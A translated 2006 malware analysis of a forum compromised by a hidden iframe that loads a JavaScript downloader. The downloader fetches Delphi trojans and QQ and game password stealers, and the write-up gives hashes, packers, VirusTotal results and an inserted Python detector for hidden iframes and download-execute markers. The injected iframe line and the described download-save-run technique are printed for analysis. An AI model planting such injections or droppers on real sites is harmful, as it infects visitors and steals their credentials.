A forum was injected with code that downloads Trojan-Downloader.Win32.Delf.ajm


Original by endurer
2006-12-15, 1st

The forum's front page had the following code injected:
/--------
<iframe src=hxxp://www.z*z***yqr.com.**/lpf/wm.htm width=0 height=0 frameborder=0></iframe>
--------/

wm.htm is a JavaScript script. It uses Microsoft.XMLHTTP and Scripting.FileSystemObject to download the file /mc/game/lpf.exe, saves it as c:/boot.exe, and runs it through the ShellExecute method of the Shell.Application object.
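As an added defender-side example (not code from the original post), the following Python scans page HTML for zero-size or hidden iframes like the one injected here, and flags script text that carries the XMLHTTP / FileSystemObject / Shell.Application.ShellExecute download-save-run combination the post describes. The sample page, the host name and the script fragment are constructed placeholders.

```python
import re

# Constructed sample of an injected forum page: one zero-size iframe like the one in
# the post (host is a placeholder; the original was masked) next to legitimate embeds.
SAMPLE_FORUM_PAGE = """<html><body><h1>Forum</h1>
<iframe src=http://attacker.invalid/lpf/wm.htm width=0 height=0 frameborder=0></iframe>
<iframe src="https://www.example.com/widget" width="300" height="200"></iframe>
<iframe src="https://www.example.com/beacon" style="display:none"></iframe>
</body></html>"""

# Constructed fragment carrying only the COM ProgIDs and method the post names;
# deliberately not a working script, just the identifiers a scanner keys on.
SAMPLE_DROPPER_FRAGMENT = ('ActiveXObject("Microsoft.XMLHTTP") ... '
                           'ActiveXObject("Scripting.FileSystemObject") ... '
                           'ActiveXObject("Shell.Application").ShellExecute(...)')
SAMPLE_BENIGN_SCRIPT = 'var xhr = new XMLHttpRequest(); xhr.open("GET", "/api/posts");'

IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*("[^"]*"|'[^']*'|[^\s>]+)""")

def iframe_attributes(tag_body):
    """Map attribute names (lowercased) to unquoted values for one <iframe ...> tag."""
    return {k.lower(): v.strip("\"'") for k, v in ATTR_RE.findall(tag_body)}

def is_zero_size(value):
    """True for the 0 / 0px / 0% forms used to make an iframe invisible."""
    return bool(re.fullmatch(r"0+(px|%)?", value.strip().lower()))

def hidden_iframes(html):
    """Return the src of every iframe that is zero-sized or hidden by inline style."""
    hits = []
    for tag_body in IFRAME_RE.findall(html):
        attrs = iframe_attributes(tag_body)
        style = attrs.get("style", "").replace(" ", "").lower()
        zero = is_zero_size(attrs.get("width", "")) or is_zero_size(attrs.get("height", ""))
        hidden = "display:none" in style or "visibility:hidden" in style
        if (zero or hidden) and "src" in attrs:
            hits.append(attrs["src"])
    return hits

# The download-save-execute triad from the post: XMLHTTP fetches the payload,
# FileSystemObject writes it to disk, Shell.Application.ShellExecute launches it.
DROPPER_MARKERS = ("microsoft.xmlhttp", "scripting.filesystemobject",
                   "shell.application", "shellexecute")

def dropper_markers(script_text):
    """List which of the marker strings appear in the script (case-insensitive)."""
    lower = script_text.lower()
    return [m for m in DROPPER_MARKERS if m in lower]

def looks_like_download_execute(script_text):
    """All four markers together is the combination worth alerting on."""
    return len(dropper_markers(script_text)) == len(DROPPER_MARKERS)
```

Run hidden_iframes over each saved forum page and dropper_markers over every fetched iframe target; a zero-size iframe whose target trips all four markers is the pattern seen in this incident.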

lpf.exe was built with Borland Delphi Setup Module
/-------
File : D:/virus/lpf.exe
Attributes : A---
Failed to get file version info size!
Created : 2006-12-15 20:52:52
Modified : 2006-12-15 20:52:54
Accessed : 2006-12-15 0:0:0
Size : 15872 bytes 15.512 KB
MD5 : 1914ec3e09f9bca86a10034ff9b3b985
-------/
Kaspersky reports it as Trojan-Downloader.Win32.Delf.ajm; Rising reports it as Trojan.DL.Multi.wen

STATUS: FINISHED

Complete scanning result of "lpf.exe", received in VirusTotal at 12.15.2006, 14:28:30 (CET).

Antivirus           Version         Update      Result
AntiVir             7.3.0.15        12.15.2006  TR/Delphi.Downloader.Gen
Authentium          4.93.8          12.14.2006  Possibly a new variant of W32/SecRisk-ProcessPatcher-Sml-based!Maximus
Avast               4.7.892.0       12.15.2006  no virus found
AVG                 386             12.15.2006  no virus found
BitDefender         7.2             12.15.2006  BehavesLike:Win32.ExplorerHijack
CAT-QuickHeal       8.00            12.14.2006  TrojanDownloader.Delf.ajm
ClamAV              devel-20060426  12.15.2006  Trojan.Downloader-51
DrWeb               4.33            12.15.2006  Trojan.DownLoader.14624
eSafe               7.0.14.0        12.14.2006  no virus found
eTrust-InoculateIT  23.73.86        12.15.2006  no virus found
eTrust-Vet          30.3.3252       12.15.2006  no virus found
Ewido               4.0             12.15.2006  Downloader.Delf.ajm
Fortinet            2.82.0.0        12.15.2006  no virus found
F-Prot              3.16f           12.14.2006  Possibly a new variant of W32/SecRisk-ProcessPatcher-Sml-based!Maximus
F-Prot4             4.2.1.29        12.14.2006  W32/SecRisk-ProcessPatcher-Sml-based!Maximus
Ikarus              T3.1.0.26       12.15.2006  no virus found
Kaspersky           4.0.2.24        12.15.2006  Trojan-Downloader.Win32.Delf.ajm
McAfee              4919            12.14.2006  Generic Delphi
Microsoft           1.1804          12.15.2006  no virus found
NOD32v2             1923            12.15.2006  probably a variant of Win32/TrojanDownloader.Delf.NDQ
Norman              5.80.02         12.15.2006  W32/Delf.TWZ
Panda               9.0.0.4         12.15.2006  Suspicious file
Prevx1              V2              12.15.2006  no virus found
Sophos              4.12.0          12.14.2006  no virus found
Sunbelt             2.2.907.0       11.30.2006  no virus found
TheHacker           6.0.3.132       12.14.2006  no virus found
UNA                 1.83            12.14.2006  no virus found
VBA32               3.11.1          12.14.2006  no virus found
VirusBuster         4.3.19:9        12.14.2006  no virus found

Additional Information
File size: 15872 bytes
MD5: 1914ec3e09f9bca86a10034ff9b3b985
SHA1: ad95735b4cb4ed24767801f3b3bde4823cd24281

lpf.exe downloads the following files:
1) /mc/bao/lipengfei.exe

Packed with UPX 0.89.6 - 1.02 / 1.05 - 1.24 -> Markus & Laszlo
/-------
File : D:/virus/lipengfei.exe
Attributes : A---
Failed to get file version info size!
Created : 2006-12-15 21:2:56
Modified : 2006-12-15 21:2:58
Accessed : 2006-12-15 0:0:0
Size : 39069 bytes 38.157 KB
MD5 : 8a91fe8298abe6d136e6e4a2071abb1e
-------/
Rising reports it as: Trojan.PSW.QQPass.qxf

Complete scanning result of "lipengfei.exe", received in VirusTotal at 12.15.2006, 14:39:16 (CET).

Antivirus           Version         Update      Result
AntiVir             7.3.0.15        12.15.2006  DR/Delphi.Gen
Authentium          4.93.8          12.14.2006  no virus found
Avast               4.7.892.0       12.15.2006  Win32:QQPass-EU
AVG                 386             12.15.2006  PSW.Generic2.SUE
BitDefender         7.2             12.15.2006  Generic.PWStealer.A771A4B9
CAT-QuickHeal       8.00            12.14.2006  no virus found
ClamAV              devel-20060426  12.15.2006  no virus found
DrWeb               4.33            12.15.2006  Trojan.PWS.Qqpass.326
eSafe               7.0.14.0        12.14.2006  suspicious Trojan/Worm
eTrust-InoculateIT  23.73.86        12.15.2006  Win32/QQPass.Variant!Trojan
eTrust-Vet          30.3.3252       12.15.2006  no virus found
Ewido               4.0             12.15.2006  Trojan.QQPass.ra
Fortinet            2.82.0.0        12.15.2006  no virus found
F-Prot              3.16f           12.14.2006  no virus found
F-Prot4             4.2.1.29        12.14.2006  no virus found
Ikarus              T3.1.0.26       12.15.2006  Trojan-PSW.Win32.Delf.IC
Kaspersky           4.0.2.24        12.15.2006  Trojan-PSW.Win32.QQPass.ra
McAfee              4919            12.14.2006  PWS-Hook.dll
Microsoft           1.1804          12.15.2006  no virus found
NOD32v2             1923            12.15.2006  probably a variant of Win32/PSW.QQShou.EP
Norman              5.80.02         12.15.2006  W32/QQPass.CHM
Panda               9.0.0.4         12.15.2006  Suspicious file
Prevx1              V2              12.15.2006  no virus found
Sophos              4.12.0          12.14.2006  no virus found
Sunbelt             2.2.907.0       11.30.2006  no virus found
TheHacker           6.0.3.132       12.14.2006  Trojan/PSW.QQPass.ra
UNA                 1.83            12.14.2006  Trojan.PSW.Win32.QQPass.6EDE
VBA32               3.11.1          12.14.2006  BackDoor.Pigeon.516
VirusBuster         4.3.19:9        12.14.2006  no virus found

Additional Information

File size: 39069 bytes
MD5: 8a91fe8298abe6d136e6e4a2071abb1e
SHA1: 6909040f888c037999d64a32f5ef90521602ab93
packers: UPX

2) /mc/pqpq.exe
Packed with nSPack 1.3 -> North Star/Liu Xing Ping
/-------
File : D:/pe/virus/pqpq.exe
Attributes : A---
Language : Chinese (China)
File version : 0.00.0195
Description :
Copyright :
Comments :
Product version : 0.00.0195
Product name : Xcd
Company name : Xcd
Legal trademarks :
Internal name : 23oigj
Original filename : 23oigj.exe
Created : 2006-12-15 21:3:12
Modified : 2006-12-15 21:3:14
Accessed : 2006-12-15 0:0:0
Size : 44151 bytes 43.119 KB
MD5 : 04433d91f101e7c95d5d77c1cbe1efd6
-------/
Rising reports it as: Trojan.PSW.Misc.kif

Complete scanning result of "pqpq.exe", received in VirusTotal at 12.15.2006, 14:47:23 (CET).

Antivirus           Version         Update      Result
AntiVir             7.3.0.15        12.15.2006  TR/PSW.Lmir.44151
Authentium          4.93.8          12.14.2006  Possibly a new variant of W32/Suspicious:VisualBasicMalware!Maximus
Avast               4.7.892.0       12.15.2006  no virus found
AVG                 386             12.15.2006  no virus found
BitDefender         7.2             12.15.2006  Generic.PWSLmir.D80E5DAD
CAT-QuickHeal       8.00            12.14.2006  (Suspicious) - DNAScan
ClamAV              devel-20060426  12.15.2006  no virus found
DrWeb               4.33            12.15.2006  BackDoor.Generic.1482
eSafe               7.0.14.0        12.14.2006  suspicious Trojan/Worm
eTrust-InoculateIT  23.73.86        12.15.2006  no virus found
eTrust-Vet          30.3.3252       12.15.2006  no virus found
Ewido               4.0             12.15.2006  no virus found
Fortinet            2.82.0.0        12.15.2006  Spy/WOWSTEAL
F-Prot              3.16f           12.14.2006  Possibly a new variant of W32/Suspicious:VisualBasicMalware!Maximus
F-Prot4             4.2.1.29        12.14.2006  W32/Suspicious:VisualBasicMalware!Maximus
Ikarus              T3.1.0.26       12.15.2006  Backdoor.Win32.PcClient.GV
Kaspersky           4.0.2.24        12.15.2006  no virus found
McAfee              4919            12.14.2006  no virus found
Microsoft           1.1804          12.15.2006  PWS:Win32/Wowsteal.gen!A
NOD32v2             1923            12.15.2006  a variant of Win32/PSW.Legendmir
Norman              5.80.02         12.15.2006  no virus found
Panda               9.0.0.4         12.15.2006  Suspicious file
Prevx1              V2              12.15.2006  Trojan.SystemPoser
Sophos              4.12.0          12.14.2006  Mal/PWS-D
Sunbelt             2.2.907.0       11.30.2006  VIPRE.Suspicious
TheHacker           6.0.3.132       12.14.2006  no virus found
UNA                 1.83            12.14.2006  no virus found
VBA32               3.11.1          12.14.2006  BackDoor.Generic.1482
VirusBuster         4.3.19:9        12.14.2006  novirus:Packed/NSPack

Additional Information

File size: 44151 bytes
MD5: 04433d91f101e7c95d5d77c1cbe1efd6
SHA1: 26478a8cb49411d3e87132cdad2c82993bf545f2
packers: NSPACK
packers: Packed
Prevx info: http://fileinfo.prevx.com/fileinfo.asp?PXC=cc5f62172717
Sunbelt info: VIPRE.Suspicious is a generic detection for potential threats that are deemed suspicious through heuristics.

3) /mc/gezi.exe  could not be obtained
4) /mc/dabao.exe could not be obtained
5) /mc/xbao.exe  could not be obtained

They are saved under C:/Program Files/Common Files as
1.exe
2.exe
3.exe
4.exe
5.exe

This is very similar to the case found earlier, except that the files' MD5 hashes differ.
